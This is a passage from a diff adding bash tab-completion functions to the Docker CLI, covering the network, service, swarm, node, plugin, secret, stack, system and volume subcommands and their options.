"$cur" in + -*) + local options="--format -f --help --size -s" + if [ -z "$preselected_type" ] ; then + options+=" --type" + fi + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + *) + case "$type" in + '') + COMPREPLY=( $( compgen -W " + $(__docker_containers --all) + $(__docker_images) + $(__docker_networks) + $(__docker_nodes) + $(__docker_plugins_installed) + $(__docker_services) + $(__docker_volumes) + " -- "$cur" ) ) + ;; + container) + __docker_complete_containers_all + ;; + image) + __docker_complete_images + ;; + network) + __docker_complete_networks + ;; + node) + __docker_complete_nodes + ;; + plugin) + __docker_complete_plugins_installed + ;; + 
service) + __docker_complete_services + ;; + volume) + __docker_complete_volumes + ;; + esac + esac +} + +_docker_kill() { + _docker_container_kill +} + +_docker_load() { + _docker_image_load +} + +_docker_login() { + case "$prev" in + --password|-p|--username|-u) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) ) + ;; + esac +} + +_docker_logout() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_logs() { + _docker_container_logs +} + +_docker_network_connect() { + local options_with_args=" + --alias + --ip + --ip6 + --link + --link-local-ip + " + + local boolean_options=" + --help + " + + case "$prev" in + --link) + case "$cur" in + *:*) + ;; + *) + __docker_complete_containers_running + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + ;; + esac + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + __docker_complete_networks + elif [ $cword -eq $(($counter + 1)) ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_network_create() { + case "$prev" in + --aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet) + return + ;; + --ipam-driver) + COMPREPLY=( $( compgen -W "default" -- "$cur" ) ) + return + ;; + --driver|-d) + # remove drivers that allow one instance only, add drivers missing in `docker info` + __docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan + return + ;; + --label) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt 
--ipv6 --label --opt -o --subnet" -- "$cur" ) ) + ;; + esac +} + +_docker_network_disconnect() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_networks + elif [ $cword -eq $(($counter + 1)) ]; then + __docker_complete_containers_in_network "$prev" + fi + ;; + esac +} + +_docker_network_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_networks + esac +} + +_docker_network_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + driver) + __docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan + return + ;; + id) + __docker_complete_networks --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_networks --cur "${cur##*=}" --name + return + ;; + type) + COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) ) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_network_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_network_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_networks --filter type=custom + esac +} + +_docker_network() { + local subcommands=" + connect + create + disconnect + inspect + ls + prune + rm + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + 
;; + esac +} + +_docker_service() { + local subcommands=" + create + inspect + ls list + rm remove + scale + ps + update + " + __docker_daemon_is_experimental && subcommands+="logs" + + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_service_create() { + _docker_service_update +} + +_docker_service_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) + ;; + *) + __docker_complete_services + esac +} + +_docker_service_logs() { + case "$prev" in + --since|--tail) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--since|--tail') + if [ $cword -eq $counter ]; then + __docker_complete_services + fi + ;; + esac +} + +_docker_service_list() { + _docker_service_ls +} + +_docker_service_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + id) + __docker_complete_services --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_service_remove() { + _docker_service_rm +} + +_docker_service_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_services + esac +} + +_docker_service_scale() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_services + 
__docker_append_to_completions "=" + __docker_nospace + ;; + esac +} + +_docker_service_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + node) + __docker_complete_nodes_plus_self --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_services + fi + ;; + esac +} + +_docker_service_update() { + local $subcommand="${words[$subcommand_pos]}" + + local options_with_args=" + --constraint + --endpoint-mode + --env -e + --force + --health-cmd + --health-interval + --health-retries + --health-timeout + --hostname + --label -l + --limit-cpu + --limit-memory + --log-driver + --log-opt + --mount + --network + --no-healthcheck + --replicas + --reserve-cpu + --reserve-memory + --restart-condition + --restart-delay + --restart-max-attempts + --restart-window + --rollback + --stop-grace-period + --update-delay + --update-failure-action + --update-max-failure-ratio + --update-monitor + --update-parallelism + --user -u + --workdir -w + " + + local boolean_options=" + --help + --tty -t + --with-registry-auth + " + + __docker_complete_log_driver_options && return + + if [ "$subcommand" = "create" ] ; then + options_with_args="$options_with_args + --container-label + --dns + --dns-option + --dns-search + --env-file + --group + --host + --mode + --name + --publish -p + --secret + " + + case "$prev" in + --env-file) + _filedir + return + ;; + --host) + case "$cur" in + *:) + 
__docker_complete_resolved_hostname + return + ;; + esac + ;; + --mode) + COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) ) + return + ;; + --secret) + __docker_complete_secrets + return + ;; + --group) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + esac + fi + if [ "$subcommand" = "update" ] ; then + options_with_args="$options_with_args + --arg + --container-label-add + --container-label-rm + --dns-add + --dns-option-add + --dns-option-rm + --dns-rm + --dns-search-add + --dns-search-rm + --group-add + --group-rm + --host-add + --host-rm + --image + --publish-add + --publish-rm + --secret-add + --secret-rm + " + + case "$prev" in + --group-add) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + --group-rm) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + --host-add|--host-rm) + case "$cur" in + *:) + __docker_complete_resolved_hostname + return + ;; + esac + ;; + --image) + __docker_complete_image_repos_and_tags + return + ;; + --secret-add|--secret-rm) + __docker_complete_secrets + return + ;; + esac + fi + + case "$prev" in + --endpoint-mode) + COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) ) + return + ;; + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --network) + __docker_complete_networks + return + ;; + --restart-condition) + COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) ) + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ "$subcommand" = "update" ] ; then + if [ $cword -eq 
$counter ]; then + __docker_complete_services + fi + else + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + fi + ;; + esac +} + +_docker_swarm() { + local subcommands=" + init + join + join-token + leave + unlock + unlock-key + update + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_init() { + case "$prev" in + --advertise-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces + __docker_nospace + fi + return + ;; + --availability) + COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) + return + ;; + --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) + return + ;; + --listen-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces --add 0.0.0.0 + __docker_nospace + fi + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_join() { + case "$prev" in + --advertise-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces + __docker_nospace + fi + return + ;; + --listen-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces --add 0.0.0.0 + __docker_nospace + fi + return + ;; + --token) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) ) + ;; + *:) + COMPREPLY=( $( 
compgen -W "2377" -- "${cur##*:}" ) ) + ;; + esac +} + +_docker_swarm_join-token() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag ) + if [ $cword -eq $counter ]; then + COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) + fi + ;; + esac +} + +_docker_swarm_leave() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_unlock() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_unlock-key() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_update() { + case "$prev" in + --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) + ;; + esac +} + +_docker_node() { + local subcommands=" + demote + inspect + ls list + promote + rm remove + ps + update + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_node_demote() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes --filter role=manager + esac +} + +_docker_node_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes_plus_self + esac +} + +_docker_node_list() { + _docker_node_ls +} + +_docker_node_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + 
id) + __docker_complete_nodes --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_nodes --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_node_promote() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes --filter role=worker + esac +} + +_docker_node_remove() { + _docker_node_rm +} + +_docker_node_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes + esac +} + +_docker_node_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes_plus_self + ;; + esac +} + +_docker_node_update() { + case "$prev" in + --availability) + COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) + return + ;; + --role) + COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) + return + ;; + --label-add|--label-rm) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes + esac +} + +_docker_pause() { + _docker_container_pause +} + +_docker_plugin() { + local subcommands=" + create + disable + enable + inspect + install + ls + push + rm + set + " + local 
aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_create() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + # reponame + return + elif [ $cword -eq $((counter + 1)) ]; then + _filedir -d + fi + ;; + esac +} + +_docker_plugin_disable() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_enable() { + case "$prev" in + --timeout) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--timeout') + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_inspect() { + case "$prev" in + --format|f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_plugins_installed + ;; + esac +} + +_docker_plugin_install() { + case "$prev" in + --alias) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_list() { + _docker_plugin_ls +} + +_docker_plugin_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_push() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + 
__docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_remove() { + _docker_plugin_rm +} + +_docker_plugin_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_plugins_installed + ;; + esac +} + +_docker_plugin_set() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + + +_docker_port() { + _docker_container_port +} + +_docker_ps() { + _docker_container_ls +} + +_docker_pull() { + _docker_image_pull +} + +_docker_push() { + _docker_image_push +} + +_docker_rename() { + _docker_container_rename +} + +_docker_restart() { + _docker_container_restart +} + +_docker_rm() { + _docker_container_rm +} + +_docker_rmi() { + _docker_image_rm +} + +_docker_run() { + _docker_container_run +} + +_docker_save() { + _docker_image_save +} + + +_docker_secret() { + local subcommands=" + create + inspect + ls + rm + " + local aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_create() { + case "$prev" in + --label|-l) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_secrets + ;; + esac +} + +_docker_secret_list() { + _docker_secret_ls +} + +_docker_secret_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_remove() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" 
-- "$cur" ) ) + ;; + *) + __docker_complete_secrets + ;; + esac +} + +_docker_secret_rm() { + _docker_secret_remove +} + + + +_docker_search() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + is-automated) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + is-official) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) ) + __docker_nospace + return + ;; + --limit) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) ) + ;; + esac +} + + +_docker_stack() { + local subcommands=" + deploy + ls + ps + rm + services + " + local aliases=" + down + list + remove + up + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_deploy() { + case "$prev" in + --bundle-file) + if __docker_is_experimental ; then + _filedir dab + return + fi + ;; + --compose-file|-c) + _filedir yml + return + ;; + esac + + case "$cur" in + -*) + local options="--compose-file -c --help --with-registry-auth" + __docker_is_experimental && options+=" --bundle-file" + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_down() { + _docker_stack_rm +} + +_docker_stack_list() { + _docker_stack_ls +} + +_docker_stack_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + id) + __docker_complete_stacks --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_stacks --cur 
"${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_remove() { + _docker_stack_rm +} + +_docker_stack_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_services() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + id) + __docker_complete_services --cur "${cur##*=}" --id + return + ;; + label) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_up() { + _docker_stack_deploy +} + + +_docker_start() { + _docker_container_start +} + +_docker_stats() { + _docker_container_stats +} + +_docker_stop() { + _docker_container_stop +} + + +_docker_system() { + local subcommands=" + df + events + info + prune + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_system_df() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W 
"--help --verbose -v" -- "$cur" ) ) + ;; + esac +} + +_docker_system_events() { + local key=$(__docker_map_key_of_current_option '-f|--filter') + case "$key" in + container) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + daemon) + local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p') + COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) ) + return + ;; + event) + COMPREPLY=( $( compgen -W " + attach + commit + connect + copy + create + delete + destroy + detach + die + disconnect + exec_create + exec_detach + exec_start + export + health_status + import + kill + load + mount + oom + pause + pull + push + reload + rename + resize + restart + save + start + stop + tag + top + unmount + unpause + untag + update + " -- "${cur##*=}" ) ) + return + ;; + image) + cur="${cur##*=}" + __docker_complete_images + return + ;; + network) + __docker_complete_networks --cur "${cur##*=}" + return + ;; + type) + COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) ) + return + ;; + volume) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) ) + __docker_nospace + return + ;; + --since|--until) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) ) + ;; + esac +} + +_docker_system_info() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_system_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) + ;; + esac +} + + +_docker_tag() { + _docker_image_tag +} + +_docker_unpause() { + _docker_container_unpause +} + +_docker_update() { + _docker_container_update +} + +_docker_top() { + _docker_container_top +} + +_docker_version() { + 
case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_create() { + case "$prev" in + --driver|-d) + __docker_complete_plugins_bundled --type Volume + return + ;; + --label|--opt|-o) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_volumes + ;; + esac +} + +_docker_volume_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + dangling) + COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) + return + ;; + driver) + __docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume + return + ;; + name) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_volumes + ;; + esac +} + +_docker_volume() { + local subcommands=" + create + inspect + ls + prune + rm + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_wait() { + _docker_container_wait +} + +_docker() { + local 
previous_extglob_setting=$(shopt -p extglob) + shopt -s extglob + + local management_commands=( + container + image + network + node + plugin + secret + service + stack + system + volume + ) + + local top_level_commands=( + build + login + logout + run + search + version + ) + + local legacy_commands=( + commit + cp + create + diff + events + exec + export + history + images + import + info + inspect + kill + load + logs + pause + port + ps + pull + push + rename + restart + rm + rmi + save + start + stats + stop + swarm + tag + top + unpause + update + wait + ) + + local experimental_commands=( + checkpoint + deploy + ) + + local commands=(${management_commands[*]} ${top_level_commands[*]}) + [ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]}) + + # These options are valid as global options for all client commands + # and valid as command options for `docker daemon` + local global_boolean_options=" + --debug -D + --tls + --tlsverify + " + local global_options_with_args=" + --config + --host -H + --log-level -l + --tlscacert + --tlscert + --tlskey + " + + local host config + + COMPREPLY=() + local cur prev words cword + _get_comp_words_by_ref -n : cur prev words cword + + local command='docker' command_pos=0 subcommand_pos + local counter=1 + while [ $counter -lt $cword ]; do + case "${words[$counter]}" in + # save host so that completion can use custom daemon + --host|-H) + (( counter++ )) + host="${words[$counter]}" + ;; + # save config so that completion can use custom configuration directories + --config) + (( counter++ )) + config="${words[$counter]}" + ;; + $(__docker_to_extglob "$global_options_with_args") ) + (( counter++ )) + ;; + -*) + ;; + =) + (( counter++ )) + ;; + *) + command="${words[$counter]}" + command_pos=$counter + break + ;; + esac + (( counter++ )) + done + + local binary="${words[0]}" + if [[ $binary == ?(*/)dockerd ]] ; then + # for the dockerd binary, we reuse completion of `docker daemon`. 
